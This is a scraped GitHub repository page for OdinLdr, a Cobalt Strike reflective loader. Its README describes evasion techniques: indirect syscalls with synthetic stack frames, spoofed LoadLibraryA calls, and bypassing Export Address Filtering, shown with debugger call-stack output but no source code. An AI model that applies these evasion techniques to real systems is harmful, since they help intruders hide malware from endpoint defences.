Thanks to visit codestin.com
Credit goes to github.com

Skip to content

NtDallas/OdinLdr

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
Bin
Bin
 
 
Common
Common
 
 
Img
Img
 
 
Utils
Utils
 
 
beacon
beacon
 
 
postex
postex
 
 
Makefile
Makefile
 
 
OdinLdr.cna
OdinLdr.cna
 
 
README.md
README.md
 
 

Repository files navigation

OdinLdr

OdinLdr

Cobaltstrike reflective loader for beacon and postex

UDRL

  • Use Indirect Syscall with Synthetic Stackframe for Nt-Allocate/Protect-VirtualMemory
 # Child-SP          RetAddr               Call Site
00 00000000`00cdf5d8 00007ffc`d9a12c66     ntdll!NtAllocateVirtualMemory+0x12
01 00000000`00cdf5e0 00007ffc`da8c7388     KERNELBASE!Internal_EnumSystemLocales+0x406
02 00000000`00cdf9c0 00007ffc`dbefcca5     KERNEL32!BaseThreadInitThunk+0x28
03 00000000`00cdf9f0 00000000`00000000     ntdll!RtlUserThreadStart+0x35
  • Call LoadLibraryA with Synthetic Stackframe
 # Child-SP          RetAddr               Call Site
00 00000000`00c3f518 00007ffc`d9a12c66     KERNEL32!LoadLibraryAStub
01 00000000`00c3f520 00007ffc`da8c7388     KERNELBASE!Internal_EnumSystemLocales+0x406
02 00000000`00c3f900 00007ffc`dbefcca5     KERNEL32!BaseThreadInitThunk+0x28
03 00000000`00c3f930 00000000`00000000     ntdll!RtlUserThreadStart+0x35
  • Use gadget to read module header and avoid presence of EAF

Beacon_Eaf_Exec Beacon_Eaf_Callback

Credit

Thanks

  • m_101 : Tips to bypass EAF
  • Tripané : Help for debug

About

Cobaltstrike Reflective Loader with Synthetic Stackframe

Resources

Readme
Activity

Stars

175 stars

Watchers

1 watching

Forks

27 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages